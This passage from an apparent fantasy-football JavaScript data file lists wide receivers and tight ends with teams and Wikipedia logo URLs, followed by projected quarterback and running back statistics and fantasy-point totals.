{id: 111, name : "<NAME>", position : "WR", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 112, name : "<NAME>", position : "WR", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 113, name : "<NAME>", position : "WR", team: "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 114, name : "<NAME>", position : "WR", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 115, name : "<NAME>", position : "WR", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 116, name : "<NAME>", position : "WR", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 117, name : "<NAME>", position : "WR", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 118, name : "<NAME>", position : "WR", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 119, name : "<NAME>", position : "WR", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 120, name : "<NAME>", position : "WR", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 121, name : "<NAME>", position : "WR", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 122, name : "<NAME>", position : "WR", team: "Jacksonville Jaguars", logo : "https://upload.wikimedia.org/wikipedia/en/7/74/Jacksonville_Jaguars_logo.svg", alt : "Jac"},
{id: 123, name : "<NAME>", position : "WR", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 124, name : "<NAME>", position : "WR", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 125, name : "<NAME>", position : "WR", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 126, name : "<NAME>", position : "WR", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 127, name : "<NAME>", position : "WR", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 128, name : "<NAME>", position : "WR", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 129, name : "<NAME>", position : "WR", team: "Denver Broncos", logo : "https://upload.wikimedia.org/wikipedia/en/4/44/Denver_Broncos_logo.svg", alt : "Den"},
{id: 130, name : "<NAME>", position : "WR", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 131, name : "<NAME>", position : "WR", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 132, name : "<NAME>", position : "WR", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 133, name : "<NAME>", position : "WR", team: "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 134, name : "<NAME>", position : "WR", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 135, name : "<NAME>", position : "WR", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 136, name : "<NAME>", position : "WR", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 137, name : "<NAME>", position : "WR", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 138, name : "<NAME>", position : "WR", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 139, name : "<NAME>", position : "WR", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 140, name : "<NAME>", position : "WR", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 141, name : "<NAME>", position : "WR", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 142, name : "<NAME>", position : "WR", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 143, name : "<NAME>", position : "TE", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 145, name : "<NAME>", position : "TE", team: "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 146, name : "<NAME>", position : "TE", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 147, name : "<NAME>", position : "TE", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 148, name : "<NAME>", position : "TE", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 149, name : "<NAME>", position : "TE", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 150, name : "<NAME>", position : "TE", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 151, name : "<NAME>", position : "TE", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 152, name : "<NAME>", position : "TE", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 153, name : "<NAME>", position : "TE", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 154, name : "<NAME>", position : "TE", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 155, name : "<NAME>", position : "TE", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 156, name : "<NAME>", position : "TE", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 157, name : "<NAME>", position : "TE", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 158, name : "<NAME>", position : "TE", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 159, name : "<NAME>", position : "TE", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 160, name : "<NAME>", position : "TE", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 161, name : "<NAME>", position : "TE", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 162, name : "<NAME>", position : "TE", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 163, name : "<NAME>", position : "TE", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 164, name : "<NAME>", position : "TE", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 165, name : "<NAME>", position : "TE", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"}
];
const teams = [];
const stats = [
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 580.7,
"CMP": 379.2,
"YDS": 4776.1,
"TDS": 35.9,
"INTS": 13.3,
"ATT_1": 52.5,
"YDS_1": 219.6,
"TDS_1": 1.9,
"FL": 2,
"FPTS": 337.5
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 509.5,
"CMP": 336.2,
"YDS": 4047.4,
"TDS": 26.2,
"INTS": 12,
"ATT_1": 95.3,
"YDS_1": 553.5,
"TDS_1": 4.3,
"FL": 2.7,
"FPTS": 318.7
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 596.2,
"CMP": 378.4,
"YDS": 4315.3,
"TDS": 29.8,
"INTS": 7.6,
"ATT_1": 46.3,
"YDS_1": 260.5,
"TDS_1": 2.1,
"FL": 2.1,
"FPTS": 310.6
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 605.4,
"CMP": 397.8,
"YDS": 4497.5,
"TDS": 33.4,
"INTS": 14.2,
"ATT_1": 51.8,
"YDS_1": 217.1,
"TDS_1": 1.4,
"FL": 2.6,
"FPTS": 310.1
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 585.5,
"CMP": 394.5,
"YDS": 4632.8,
"TDS": 30.1,
"INTS": 10.6,
"ATT_1": 48.2,
"YDS_1": 132.6,
"TDS_1": 1.5,
"FL": 2,
"FPTS": 302.6
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 515,
"CMP": 336.5,
"YDS": 3775.4,
"TDS": 24.6,
"INTS": 13.7,
"ATT_1": 113.2,
"YDS_1": 546.1,
"TDS_1": 4.4,
"FL": 1.7,
"FPTS": 300
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 538.5,
"CMP": 387.2,
"YDS": 4338.2,
"TDS": 30.5,
"INTS": 8.8,
"ATT_1": 24.8,
"YDS_1": 40.2,
"TDS_1": 1.9,
"FL": 1.6,
"FPTS": 290.3
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 560.7,
"CMP": 356.5,
"YDS": 4430.0,
"TDS": 27.4,
"INTS": 16.3,
"ATT_1": 57.2,
"YDS_1": 277.1,
"TDS_1": 1.6,
"FL": 2.7,
"FPTS": 286.3
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 564.7,
"CMP": 362.5,
"YDS": 4335.3,
"TDS": 30.8,
"INTS": 14.6,
"ATT_1": 47,
"YDS_1": 180.8,
"TDS_1": 0.9,
"FL": 2.4,
"FPTS": 285.8
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 522.1,
"CMP": 344.3,
"YDS": 3856.2,
"TDS": 23.7,
"INTS": 10.9,
"ATT_1": 68,
"YDS_1": 311.2,
"TDS_1": 5.3,
"FL": 2.3,
"FPTS": 285.6
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 551,
"CMP": 352.1,
"YDS": 4378.1,
"TDS": 30.2,
"INTS": 11.7,
"ATT_1": 31.1,
"YDS_1": 102.8,
"TDS_1": 1.2,
"FL": 2.2,
"FPTS": 285.5
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 568.4,
"CMP": 376.6,
"YDS": 4237.3,
"TDS": 30,
"INTS": 12.3,
"ATT_1": 52.3,
"YDS_1": 192,
"TDS_1": 1,
"FL": 2.6,
"FPTS": 284.8
},
{
"Player": "<NAME>",
"Team": "PIT",
"ATT": 619.1,
"CMP": 406,
"YDS": 4636.9,
"TDS": 29.4,
"INTS": 15.2,
"ATT_1": 23.3,
"YDS_1": 75.3,
"TDS_1": 1.2,
"FL": 1.8,
"FPTS": 284.1
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 431.9,
"CMP": 255.9,
"YDS": 2988.4,
"TDS": 16.9,
"INTS": 10.7,
"ATT_1": 172.5,
"YDS_1": 886.9,
"TDS_1": 6.1,
"FL": 4.9,
"FPTS": 281.3
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 453.2,
"CMP": 292.2,
"YDS": 3565.9,
"TDS": 27.8,
"INTS": 9.5,
"ATT_1": 73,
"YDS_1": 381.5,
"TDS_1": 2,
"FL": 2.1,
"FPTS": 281.1
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 580.3,
"CMP": 380,
"YDS": 4353.1,
"TDS": 29.2,
"INTS": 10.7,
"ATT_1": 20.8,
"YDS_1": 38.8,
"TDS_1": 1,
"FL": 1.5,
"FPTS": 276.4
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 578.4,
"CMP": 397.8,
"YDS": 4183.6,
"TDS": 27.9,
"INTS": 12.1,
"ATT_1": 38.5,
"YDS_1": 134.1,
"TDS_1": 1.9,
"FL": 2.4,
"FPTS": 274.4
},
{
"Player": "<NAME>",
"Team": "CHI",
"ATT": 511.3,
"CMP": 332.8,
"YDS": 3760.7,
"TDS": 25.1,
"INTS": 13,
"ATT_1": 65.9,
"YDS_1": 377.9,
"TDS_1": 2.4,
"FL": 2.5,
"FPTS": 272.1
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 546.3,
"CMP": 360.1,
"YDS": 4367.4,
"TDS": 29.6,
"INTS": 12.2,
"ATT_1": 13.5,
"YDS_1": 25.2,
"TDS_1": 0.2,
"FL": 1.4,
"FPTS": 269.8
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 537.4,
"CMP": 331.8,
"YDS": 3694.6,
"TDS": 21.6,
"INTS": 14.3,
"ATT_1": 107,
"YDS_1": 506.9,
"TDS_1": 3.2,
"FL": 3.2,
"FPTS": 268.9
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 479.7,
"CMP": 270.6,
"YDS": 3210.1,
"TDS": 17.3,
"INTS": 14.4,
"ATT_1": 104.8,
"YDS_1": 664.1,
"TDS_1": 6.3,
"FL": 2.9,
"FPTS": 267.1
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 519.2,
"CMP": 333.8,
"YDS": 4073.9,
"TDS": 25.1,
"INTS": 14.2,
"ATT_1": 37.7,
"YDS_1": 122.2,
"TDS_1": 1.3,
"FL": 2.1,
"FPTS": 250.8
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 560,
"CMP": 368.8,
"YDS": 3971.3,
"TDS": 24.2,
"INTS": 11.6,
"ATT_1": 28.9,
"YDS_1": 78.5,
"TDS_1": 0.7,
"FL": 1.7,
"FPTS": 241.4
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 570.3,
"CMP": 379.4,
"YDS": 4098.3,
"TDS": 23.6,
"INTS": 12.2,
"ATT_1": 24.5,
"YDS_1": 68.7,
"TDS_1": 0.6,
"FL": 2.1,
"FPTS": 240.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 533.6,
"CMP": 331.2,
"YDS": 3684.9,
"TDS": 24,
"INTS": 13.6,
"ATT_1": 32.9,
"YDS_1": 119.9,
"TDS_1": 0.9,
"FL": 1.7,
"FPTS": 229.9
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 530.7,
"CMP": 320,
"YDS": 3645.3,
"TDS": 22.6,
"INTS": 15.8,
"ATT_1": 48,
"YDS_1": 187.5,
"TDS_1": 1.6,
"FL": 2.3,
"FPTS": 228
},
{
"Player": "<NAME>",
"Team": "TEN",
"ATT": 446.9,
"CMP": 294,
"YDS": 3269.0,
"TDS": 18.3,
"INTS": 12.6,
"ATT_1": 70.4,
"YDS_1": 358.9,
"TDS_1": 2.6,
"FL": 2.4,
"FPTS": 225.6
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 531.8,
"CMP": 338.8,
"YDS": 3777.9,
"TDS": 21.5,
"INTS": 13.3,
"ATT_1": 33.1,
"YDS_1": 76.5,
"TDS_1": 0.9,
"FL": 2,
"FPTS": 219.9
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 497.4,
"CMP": 314.4,
"YDS": 3382.5,
"TDS": 19,
"INTS": 10.7,
"ATT_1": 20.7,
"YDS_1": 50.3,
"TDS_1": 1,
"FL": 2.5,
"FPTS": 196
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 87.3,
"CMP": 54,
"YDS": 730.1,
"TDS": 3.9,
"INTS": 3.1,
"ATT_1": 5.8,
"YDS_1": 33.7,
"TDS_1": 0.3,
"FL": 0.4,
"FPTS": 42.9
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 269,
"YDS": 1253.7,
"TDS": 9.6,
"REC": 87.6,
"YDS_1": 705.5,
"TDS_1": 3.4,
"FL": 1.5,
"FPTS": 358.6
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 215.8,
"YDS": 1044.8,
"TDS": 6.7,
"REC": 97.2,
"YDS_1": 824.3,
"TDS_1": 5.1,
"FL": 1.8,
"FPTS": 351.6
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 194.7,
"YDS": 913.8,
"TDS": 9.6,
"REC": 87.4,
"YDS_1": 771.3,
"TDS_1": 4.6,
"FL": 1.5,
"FPTS": 338.3
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 294.3,
"YDS": 1295.2,
"TDS": 8.9,
"REC": 67,
"YDS_1": 515.7,
"TDS_1": 2.6,
"FL": 2.2,
"FPTS": 312.5
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 257.1,
"YDS": 1106.4,
"TDS": 7.6,
"REC": 64,
"YDS_1": 514.9,
"TDS_1": 2.6,
"FL": 1.8,
"FPTS": 284.1
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 247,
"YDS": 1000.4,
"TDS": 7.4,
"REC": 59.3,
"YDS_1": 565.3,
"TDS_1": 3.1,
"FL": 2.4,
"FPTS": 274.3
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 245.8,
"YDS": 1113.0,
"TDS": 6.6,
"REC": 59.5,
"YDS_1": 455.8,
"TDS_1": 2.2,
"FL": 2.9,
"FPTS": 263.5
},
{
"Player": "<NAME>",
"Team": "PIT",
"ATT": 228.1,
"YDS": 1016.9,
"TDS": 9.5,
"REC": 53.5,
"YDS_1": 435.2,
"TDS_1": 1.6,
"FL": 1.7,
"FPTS": 261.6
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 218.4,
"YDS": 1009.4,
"TDS": 9.9,
"REC": 46.3,
"YDS_1": 423.9,
"TDS_1": 2.6,
"FL": 1.5,
"FPTS": 261.4
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 245.7,
"YDS": 1144.0,
"TDS": 8.4,
"REC": 47.1,
"YDS_1": 354.8,
"TDS_1": 1.2,
"FL": 1.5,
"FPTS": 251.5
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 243.8,
"YDS": 1165.0,
"TDS": 9.2,
"REC": 32.7,
"YDS_1": 251.6,
"TDS_1": 1.6,
"FL": 1,
"FPTS": 236.8
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 212.4,
"YDS": 997.4,
"TDS": 6.5,
"REC": 49.5,
"YDS_1": 354.9,
"TDS_1": 1.9,
"FL": 1.7,
"FPTS": 231.4
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 249.5,
"YDS": 968.1,
"TDS": 7.5,
"REC": 43.6,
"YDS_1": 362,
"TDS_1": 1.5,
"FL": 1.2,
"FPTS": 228
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 179.9,
"YDS": 812.7,
"TDS": 7.5,
"REC": 42.8,
"YDS_1": 390.3,
"TDS_1": 2.5,
"FL": 1.2,
"FPTS": 221.1
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 195.4,
"YDS": 969.1,
"TDS": 8.5,
"REC": 37.3,
"YDS_1": 287.5,
"TDS_1": 1.4,
"FL": 1.4,
"FPTS": 219.4
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 214,
"YDS": 938.7,
"TDS": 6.5,
"REC": 42.3,
"YDS_1": 353,
"TDS_1": 1.6,
"FL": 1.6,
"FPTS": 217.1
},
{
"Player": "<NAME>",
"Team": "TEN",
"ATT": 268.6,
"YDS": 1240.6,
"TDS": 10.4,
"REC": 17,
"YDS_1": 129.1,
"TDS_1": 0.3,
"FL": 1.3,
"FPTS": 215.8
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 151,
"YDS": 728.8,
"TDS": 6.9,
"REC": 46.5,
"YDS_1": 368.8,
"TDS_1": 3.4,
"FL": 1.4,
"FPTS": 215.6
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 239.6,
"YDS": 1113.4,
"TDS": 8.2,
"REC": 27.3,
"YDS_1": 220.8,
"TDS_1": 1,
"FL": 1.9,
"FPTS": 212
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 202.9,
"YDS": 874,
"TDS": 6.9,
"REC": 41.5,
"YDS_1": 331.5,
"TDS_1": 1.8,
"FL": 1.3,
"FPTS": 211.7
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 67.2,
"YDS": 285.7,
"TDS": 2.5,
"REC": 71.1,
"YDS_1": 629.6,
"TDS_1": 4.1,
"FL": 0.5,
"FPTS": 201.2
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 234.6,
"YDS": 1061.9,
"TDS": 7.9,
"REC": 26,
"YDS_1": 187.4,
"TDS_1": 0.9,
"FL": 1.5,
"FPTS": 201
},
{
"Player": "<NAME>",
"Team": "CHI",
"ATT": 204.1,
"YDS": 888.1,
"TDS": 6.4,
"REC": 33.7,
"YDS_1": 275.6,
"TDS_1": 1.4,
"FL": 1.9,
"FPTS": 193.1
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 221.5,
"YDS": 940.3,
"TDS": 6.7,
"REC": 32.5,
"YDS_1": 247.6,
"TDS_1": 0.8,
"FL": 1.7,
"FPTS": 193
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 185.7,
"YDS": 899,
"TDS": 6.4,
"REC": 34.5,
"YDS_1": 249.3,
"TDS_1": 1,
"FL": 1,
"FPTS": 191.8
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 236.7,
"YDS": 1076.9,
"TDS": 9.2,
"REC": 11.3,
"YDS_1": 85.9,
"TDS_1": 0.3,
"FL": 1.5,
"FPTS": 181.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 143,
"YDS": 609.6,
"TDS": 3.8,
"REC": 46.8,
"YDS_1": 393.1,
"TDS_1": 2.3,
"FL": 1.4,
"FPTS": 181.1
},
{
"Player": "<NAME>",
"Team": "CHI",
"ATT": 84.1,
"YDS": 352.2,
"TDS": 2.2,
"REC": 59,
"YDS_1": 550.8,
"TDS_1": 3.1,
"FL": 1.7,
"FPTS": 177.8
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 122.3,
"YDS": 575,
"TDS": 3.2,
"REC": 45.9,
"YDS_1": 410.9,
"TDS_1": 2.2,
"FL": 0.7,
"FPTS": 175.1
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 178.5,
"YDS": 800.3,
"TDS": 5.6,
"REC": 29.6,
"YDS_1": 249.8,
"TDS_1": 0.9,
"FL": 1.6,
"FPTS": 170.3
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 168.1,
"YDS": 777,
"TDS": 4.8,
"REC": 29,
"YDS_1": 262.1,
"TDS_1": 1.5,
"FL": 0.8,
"FPTS": 168.7
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 122.3,
"YDS": 564.1,
"TDS": 3.4,
"REC": 40.5,
"YDS_1": 378.5,
"TDS_1": 2.1,
"FL": 1,
"FPTS": 165.9
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 152.2,
"YDS": 666.4,
"TDS": 4,
"REC": 31.9,
"YDS_1": 288.9,
"TDS_1": 1.6,
"FL": 1,
"FPTS": 158.7
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 157.8,
"YDS": 620.6,
"TDS": 4.4,
"REC": 32.7,
"YDS_1": 260.7,
"TDS_1": 1.3,
"FL": 1.4,
"FPTS": 152.6
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 180.7,
"YDS": 741,
"TDS": 4.7,
"REC": 22.1,
"YDS_1": 148.1,
"TDS_1": 0.6,
"FL": 1.4,
"FPTS": 139.6
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 164,
"YDS": 648,
"TDS": 6.4,
"REC": 17.1,
"YDS_1": 112.8,
"TDS_1": 0.4,
"FL": 0.8,
"FPTS": 132.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 150.9,
"YDS": 683.9,
"TDS": 4,
"REC": 18.6,
"YDS_1": 143.4,
"TDS_1": 0.8,
"FL": 1,
"FPTS": 127.8
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 56.1,
"YDS": 232.9,
"TDS": 0.9,
"REC": 49.8,
"YDS_1": 384.6,
"TDS_1": 1.9,
"FL": 0.8,
"FPTS": 126.3
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 124.9,
"YDS": 484.9,
"TDS": 4,
"REC": 27.9,
"YDS_1": 212.1,
"TDS_1": 1.1,
"FL": 1.1,
"FPTS": 125.7
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 157.8,
"YDS": 570.3,
"TDS": 3.4,
"REC": 24,
"YDS_1": 205.5,
"TDS_1": 0.8,
"FL": 1,
"FPTS": 125
},
{
"Player": "<NAME>",
"Team": "MIA",
"ATT": 127.4,
"YDS": 628.6,
"TDS": 3.8,
"REC": 23.7,
"YDS_1": 175.1,
"TDS_1": 0.4,
"FL": 2.4,
"FPTS": 124.5
},
{
"Player": "<NAME>",
"Team": "TEN",
"ATT": 94.4,
"YDS": 367.6,
"TDS": 2,
"REC": 41.4,
"YDS_1": 297.2,
"TDS_1": 1,
"FL": 0.7,
"FPTS": 124.4
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 117.1,
"YDS": 525.4,
"TDS": 3.6,
"REC": 24.2,
"YDS_1": 207.3,
"TDS_1": 1,
"FL": 1.3,
"FPTS": 122.1
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 48.4,
"YDS": 227.3,
"TDS": 1.3,
"REC": 47,
"YDS_1": 402.9,
"TDS_1": 1.2,
"FL": 1.6,
"FPTS": 121.8
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 152.6,
"YDS": 652,
"TDS": 5,
"REC": 15.8,
"YDS_1": 106.6,
"TDS_1": 0.3,
"FL": 1.1,
"FPTS": 121.5
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 73.6,
"YDS": 295.3,
"TDS": 1.5,
"REC": 39.4,
"YDS_1": 294.9,
"TDS_1": 1.3,
"FL": 0.7,
"FPTS": 113.5
},
{
"Player": "<NAME>",
"Team": "PIT",
"ATT": 74.8,
"YDS": 313.2,
"TDS": 2,
"REC": 32.2,
"YDS_1": 259.9,
"TDS_1": 2,
"FL": 0.7,
"FPTS": 112
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 135,
"YDS": 570,
"TDS": 4.7,
"REC": 16.8,
"YDS_1": 115,
"TDS_1": 0.2,
"FL": 1.5,
"FPTS": 111.5
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 160.3,
"YDS": 594.4,
"TDS": 3.9,
"REC": 15.1,
"YDS_1": 101.7,
"TDS_1": 0.3,
"FL": 1,
"FPTS": 108.1
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 120,
"YDS": 585.9,
"TDS": 3.2,
"REC": 14.4,
"YDS_1": 122.7,
"TDS_1": 0.5,
"FL": 0.8,
"FPTS": 105.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 75.3,
"YDS": 288.6,
"TDS": 1.9,
"REC": 33.9,
"YDS_1": 259.2,
"TDS_1": 0.7,
"FL": 0.4,
"FPTS": 103.4
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 100.6,
"YDS": 408.4,
"TDS": 3.3,
"REC": 23.4,
"YDS_1": 160.2,
"TDS_1": 0.7,
"FL": 0.8,
"FPTS": 102.7
},
{
"Player": "<NAME>",
